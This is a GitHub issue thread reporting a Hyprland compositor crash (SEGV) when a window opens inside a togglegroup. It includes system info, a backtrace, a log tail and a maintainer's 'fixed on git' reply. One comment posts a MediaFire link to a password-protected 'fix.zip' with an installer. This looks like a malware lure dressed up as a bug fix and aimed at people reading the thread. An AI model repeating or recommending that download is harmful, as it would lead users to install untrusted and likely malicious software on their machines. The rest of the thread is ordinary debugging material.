### ISSUE TITLE
Attempt to open more, than one window inside a togglegroup container crashes hyprland

### ISSUE THREAD

**Issue by izmyname** [hyprwm/Hyprland#7520]
### Regression?

Yes

### System Info and Version

<details> <summary>System/Version info</summary>

```sh
<Hyprland, built from branch main at commit b672118f9238a48a18efd741cbcda387c5552238  (xwayland: deactivate xwayland focus if wayland is focused (7458)).
Date: Sun Aug 25 19:37:03 2024
Tag: v0.42.0-67-gb672118f, commits: 5136

flags: (if any)


System Information:
System name: Linux
Node name: archbtw
Release: 6.10.6-zen1-1-zen
Version: #1 ZEN SMP PREEMPT_DYNAMIC Mon, 19 Aug 2024 17:02:05 +0000


GPU information: 
00:02.0 VGA compatible controller [0300]: Intel Corporation CometLake-H GT2 [UHD Graphics] [8086:9bc4] (rev 05) (prog-if 00 [VGA controller])
01:00.0 VGA compatible controller [0300]: NVIDIA Corporation TU116M [GeForce GTX 1660 Ti Mobile] [10de:2191] (rev a1) (prog-if 00 [VGA controller])
NVRM version: NVIDIA UNIX x86_64 Kernel Module  560.35.03  Fri Aug 16 21:39:15 UTC 2024


os-release: NAME="Arch Linux"
PRETTY_NAME="Arch Linux"
ID=arch
BUILD_ID=rolling
ANSI_COLOR="38;2;23;147;209"
HOME_URL="https://archlinux.org/"
DOCUMENTATION_URL="https://wiki.archlinux.org/"
SUPPORT_URL="https://bbs.archlinux.org/"
BUG_REPORT_URL="https://gitlab.archlinux.org/groups/archlinux/-/issues"
PRIVACY_POLICY_URL="https://terms.archlinux.org/docs/privacy-policy/"
LOGO=archlinux-logo


plugins:>
```

</details>

### Description

Enabling a togglegroup, then, attempting to open another window inside the group, crashes the compositor.

### How to reproduce

1. Open any window

2.Use keybind to create a togglegroup container.
`bind = $mainMod, T, togglegroup`

3. Attempt to open any other window inside the togglegroup container.

4. Freeze, then crash.

### Crash reports, logs, images, videos

--------------------------------------------
   Hyprland Crash Report
--------------------------------------------
All these computers...

Hyprland received signal 11(SEGV)
Version: b672118f9238a48a18efd741cbcda387c5552238
Tag: v0.42.0-67-gb672118f
Date: Sun Aug 25 19:37:03 2024
Flags:

System info:
	System name: Linux
	Node name: archbtw
	Release: 6.10.6-zen1-1-zen
	Version: #1 ZEN SMP PREEMPT_DYNAMIC Mon, 19 Aug 2024 17:02:05 +0000

GPU:
	00:02.0 VGA compatible controller [0300]: Intel Corporation CometLake-H GT2 [UHD Graphics] [8086:9bc4] (rev 05) (prog-if 00 [VGA controller])
01:00.0 VGA compatible controller [0300]: NVIDIA Corporation TU116M [GeForce GTX 1660 Ti Mobile] [10de:2191] (rev a1) (prog-if 00 [VGA controller])

os-release:
	NAME="Arch Linux"
	PRETTY_NAME="Arch Linux"
	ID=arch
	BUILD_ID=rolling
	ANSI_COLOR="38;2;23;147;209"
	HOME_URL="https://archlinux.org/"
	DOCUMENTATION_URL="https://wiki.archlinux.org/"
	SUPPORT_URL="https://bbs.archlinux.org/"
	BUG_REPORT_URL="https://gitlab.archlinux.org/groups/archlinux/-/issues"
	PRIVACY_POLICY_URL="https://terms.archlinux.org/docs/privacy-policy/"
	LOGO=archlinux-logo
Backtrace:
	# | Hyprland(_Z12getBacktracev+0x46) [0x6367bb5b2296]
		getBacktrace()
		??:?
	#1 | Hyprland(_ZN13CrashReporter18createAndSaveCrashEi+0xabe) [0x6367bb539abe]
		CrashReporter::createAndSaveCrash(int)
		??:?
	#2 | Hyprland(_Z25handleUnrecoverableSignali+0x5c) [0x6367bb4cd7cc]
		handleUnrecoverableSignal(int)
		??:?
	#3 | /usr/lib/libc.so.6(+0x3d1d0) [0x724abce4c1d0]
		??
		??:0
	#4 | Hyprland(+0xd951c) [0x6367bb40851c]
		??
		??:0
	#5 | Hyprland(_ZN11CCompositor12focusSurfaceEN9Hyprutils6Memory14CSharedPointerI18CWLSurfaceResourceEENS2_I7CWindowEE+0x3da) [0x6367bb4d324a]
		CCompositor::focusSurface(Hyprutils::Memory::CSharedPointer<CWLSurfaceResource>, Hyprutils::Memory::CSharedPointer<CWindow>)
		??:?
	#6 | Hyprland(_ZN11CCompositor11focusWindowEN9Hyprutils6Memory14CSharedPointerI7CWindowEENS2_I18CWLSurfaceResourceEE+0x9d6) [0x6367bb4d6f26]
		CCompositor::focusWindow(Hyprutils::Memory::CSharedPointer<CWindow>, Hyprutils::Memory::CSharedPointer<CWLSurfaceResource>)
		??:?
	#7 | Hyprland(_ZN7CWindow15setGroupCurrentEN9Hyprutils6Memory14CSharedPointerIS_EE+0x537) [0x6367bb576eb7]
		CWindow::setGroupCurrent(Hyprutils::Memory::CSharedPointer<CWindow>)
		??:?
	#8 | Hyprland(_ZN18CHyprDwindleLayout21onWindowCreatedTilingEN9Hyprutils6Memory14CSharedPointerI7CWindowEE10eDirection+0x15a2) [0x6367bb5c7b02]
		CHyprDwindleLayout::onWindowCreatedTiling(Hyprutils::Memory::CSharedPointer<CWindow>, eDirection)
		??:?
	#9 | Hyprland(_ZN11IHyprLayout15onWindowCreatedEN9Hyprutils6Memory14CSharedPointerI7CWindowEE10eDirection+0x1da) [0x6367bb5ca06a]
		IHyprLayout::onWindowCreated(Hyprutils::Memory::CSharedPointer<CWindow>, eDirection)
		??:?
	#1 | Hyprland(_ZN6Events18listener_mapWindowEPvS0_+0x2134) [0x6367bb5a2124]
		Events::listener_mapWindow(void*, void*)
		??:?
	#11 | Hyprland(+0x251357) [0x6367bb580357]
		CWLSurface::assign(Hyprutils::Memory::CSharedPointer<CWLSurfaceResource>, CPopup*)
		??:?
	#12 | /usr/lib/libhyprutils.so.1(_ZN9Hyprutils6Signal15CSignalListener4emitESt3any+0x5f) [0x724abd8d5c9f]
		??
		??:0
	#13 | /usr/lib/libhyprutils.so.1(_ZN9Hyprutils6Signal7CSignal4emitESt3any+0x1ee) [0x724abd8d600e]
		??
		??:0
	#14 | Hyprland(+0x42e590) [0x6367bb75d590]
		CXDGShellProtocol::onPopupDestroy(Hyprutils::Memory::CWeakPointer<CXDGPopupResource>)
		??:?
	#15 | /usr/lib/libhyprutils.so.1(_ZN9Hyprutils6Signal15CSignalListener4emitESt3any+0x5f) [0x724abd8d5c9f]
		??
		??:0
	#16 | /usr/lib/libhyprutils.so.1(_ZN9Hyprutils6Signal7CSignal4emitESt3any+0x1ee) [0x724abd8d600e]
		??
		??:0
	#17 | Hyprland(+0x3432bf) [0x6367bb6722bf]
		CWLSurfaceResource::~CWLSurfaceResource()
		??:?
	#18 | Hyprland(_ZN18CWLSurfaceResource8bfHelperESt6vectorIN9Hyprutils6Memory14CSharedPointerIS_EESaIS4_EESt8functionIFvS4_RKNS1_4Math8Vector2DEPvEESC_+0x5c3) [0x6367bb66d773]
		CWLSurfaceResource::bfHelper(std::vector<Hyprutils::Memory::CSharedPointer<CWLSurfaceResource>, std::allocator<Hyprutils::Memory::CSharedPointer<CWLSurfaceResource> > >, std::function<void (Hyprutils::Memory::CSharedPointer<CWLSurfaceResource>, Hyprutils::Math::Vector2D const&, void*)>, void*)
		??:?
	#19 | Hyprland(_ZN18CWLSurfaceResource12breadthfirstESt8functionIFvN9Hyprutils6Memory14CSharedPointerIS_EERKNS1_4Math8Vector2DEPvEES9_+0x1a3) [0x6367bb66e113]
		CWLSurfaceResource::breadthfirst(std::function<void (Hyprutils::Memory::CSharedPointer<CWLSurfaceResource>, Hyprutils::Math::Vector2D const&, void*)>, void*)
		??:?
	#2 | Hyprland(_ZN18CWLSurfaceResource18commitPendingStateEv+0x883) [0x6367bb675483]
		CWLSurfaceResource::commitPendingState()
		??:?
	#21 | Hyprland(+0x48be4d) [0x6367bb7bae4d]
		CXWM::setClipboardToWayland(SXSelection&)
		??:?
	#22 | /usr/lib/libffi.so.8(+0x7596) [0x724abcd13596]
		??
		??:0
	#23 | /usr/lib/libffi.so.8(+0x400e) [0x724abcd1000e]
		??
		??:0
	#24 | /usr/lib/libffi.so.8(ffi_call+0x123) [0x724abcd12bd3]
		??
		??:0
	#25 | /usr/lib/libwayland-server.so.0(+0x6e45) [0x724abdaa6e45]
		??
		??:0
	#26 | /usr/lib/libwayland-server.so.0(+0xbc42) [0x724abdaabc42]
		??
		??:0
	#27 | /usr/lib/libwayland-server.so.0(wl_event_loop_dispatch+0x1f2) [0x724abdaaa0a2]
		??
		??:0
	#28 | /usr/lib/libwayland-server.so.0(wl_display_run+0x2f) [0x724abdaac10f]
		??
		??:0
	#29 | Hyprland(_ZN17CEventLoopManager9enterLoopEv+0x26d) [0x6367bb5e11ed]
		CEventLoopManager::enterLoop()
		??:?
	#3 | Hyprland(main+0xc14) [0x6367bb465d54]
		main
		??:?
	#31 | /usr/lib/libc.so.6(+0x25e08) [0x724abce34e08]
		??
		??:0
	#32 | /usr/lib/libc.so.6(__libc_start_main+0x8c) [0x724abce34ecc]
		??
		??:0
	#33 | Hyprland(_start+0x25) [0x6367bb4947d5]
		_start
		??:?

Log tail:

[LOG] [AQ] [libinput] event14 - tap: touch 1 (TOUCH_END), tap state TAP_STATE_TOUCH_2_RELEASE → TAP_EVENT_RELEASE → TAP_STATE_2FGTAP_TAPPED

[ERR] CPopup: orphaned (no surface/resource) and unmaps??
[LOG] CWLSurface 6367c0214070 called destroy()
[LOG] [CWLCompositorResource] New wl_surface with id 46 at 6367c0216dd0
[LOG] [CXDGWMBase] New xdg_positioner at 6367c04bf500
[LOG] [CXDGWMBase] New xdg_surface at 6367c05ac6c0
[LOG] [CXDGSurfaceResource] xdg_surface 6367c05ac6c0 gets a popup 6367c01080e0 owner 0
[LOG] CWLSurface 6367c0214070 called init()
[LOG] GetPosition with constraint [Vector2D: x: 0, y: 0] [Vector2D: x: 1920, y: 1080] and parent [Vector2D: x: 20, y: 0]
[LOG] [CXDGPopupResource] Popup 6367c01080e0 gets unconstrained to [Vector2D: x: 1702, y: 34] [Vector2D: x: 194, y: 31]
[LOG] New popup at 6367c018ee00
[LOG] [CXDGSurfaceResource] xdg_surface 6367c05ac6c0 requests geometry 0x0 194x31
[LOG] [CWLCompositorResource] New wl_region with id 43 at 6367c046a940
[LOG] [CWLDataDeviceProtocol] New datamgr resource bound at 6367c01165a0
[LOG] [CPrimarySelectionProtocol] New primary_seletion_manager at 6367c029ac90
[LOG] [CWLSeatProtocol] New seat resource bound at 6367c029ad20
[LOG] [CPrimarySelectionManager] New primary selection data device bound at 6367c046dc60
[LOG] [CWLDataDeviceManagerResource] New data device bound at 6367c01ea0a0
[LOG] [CWLCompositorResource] New wl_surface with id 29 at 6367c029af60
[LOG] [AQ] [libinput] event14 - tap: touch -1 (), tap state TAP_STATE_2FGTAP_TAPPED → TAP_EVENT_TIMEOUT → TAP_STATE_IDLE

[LOG] [CWLCompositorResource] New wl_region with id 45 at 6367c0191e20
[LOG] [CWLCompositorResource] New wl_region with id 45 at 6367c01131f0
[LOG] [CXDGShellProtocol] New xdg_wm_base at 6367c018e3b0
[LOG] [CWLCompositorResource] New wl_surface with id 34 at 6367c029bfd0
[LOG] [CXDGWMBase] New xdg_surface at 6367c05ac8b0
[LOG] [CXDGSurfaceResource] xdg_surface 6367c018e3b0 gets a toplevel 6367c0215690
[LOG] CWLSurface 6367c029bc90 called init()
[LOG] [CXDGToplevelResource] Toplevel 6367c0215690 sets parent to 0
[LOG] Window 6367c029c3a0 set title to Helvum - Pipewire Patchbay
[LOG] Searching for matching rules for  (title: Helvum - Pipewire Patchbay)
[LOG] Window rule suppressevent maximize ->  class:.* matched [Window 6367c029c3a0: title: "Helvum - Pipewire Patchbay"]
[LOG] Window 6367c029c3a0 set class to org.pipewire.Helvum
[LOG] Searching for matching rules for org.pipewire.Helvum (title: Helvum - Pipewire Patchbay)
[LOG] Window rule suppressevent maximize ->  class:.* matched [Window 6367c029c3a0: title: "Helvum - Pipewire Patchbay"]
[LOG] Searching for matching rules for org.pipewire.Helvum (title: Helvum - Pipewire Patchbay)
[LOG] Window rule suppressevent maximize ->  class:.* matched [Window 6367c029c3a0: title: "Helvum - Pipewire Patchbay"]
[LOG] Layout predicts size [Vector2D: x: 960, y: 1045] for [Window 6367c029c3a0: title: "Helvum - Pipewire Patchbay"]
[LOG] [CXDGSurfaceResource] xdg_surface 6367c05ac8b0 requests geometry 20x20 960x1045
[LOG] [CWLCompositorResource] New wl_region with id 45 at 6367c029d720
[LOG] [CWLCompositorResource] New wl_region with id 46 at 6367c029d720
[LOG] [CLinuxDMABBUFParamsResource] Creating a dmabuf, with id 50: size [Vector2D: x: 1000, y: 1085], fmt AR24, planes 2
[LOG] [CLinuxDMABBUFParamsResource]  | plane 0: mod 72057594037927940 fd 440 stride 4096 offset 0
[LOG] [CLinuxDMABBUFParamsResource]  | plane 1: mod 72057594037927940 fd 441 stride 128 offset 4456448
[LOG] Searching for matching rules for org.pipewire.Helvum (title: Helvum - Pipewire Patchbay)
[LOG] Window rule suppressevent maximize ->  class:.* matched [Window 6367c029c3a0: title: "Helvum - Pipewire Patchbay"]
[LOG] OPENINGON: [Node 6367c00fdd40: workspace: -98, pos: [0.00, 35.00], size: [1920.00, 1045.00], window: 6367c0103e90], Monitor: 0
[LOG] Set keyboard focus to surface 6367c029bfd0, with [Window 6367c029c3a0: title: "Helvum - Pipewire Patchbay"]

**Comment by izmyname** [comment]
Also, the bad commit is either, dated 25 aug.

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by vaxerski** [comment]
fixed on git
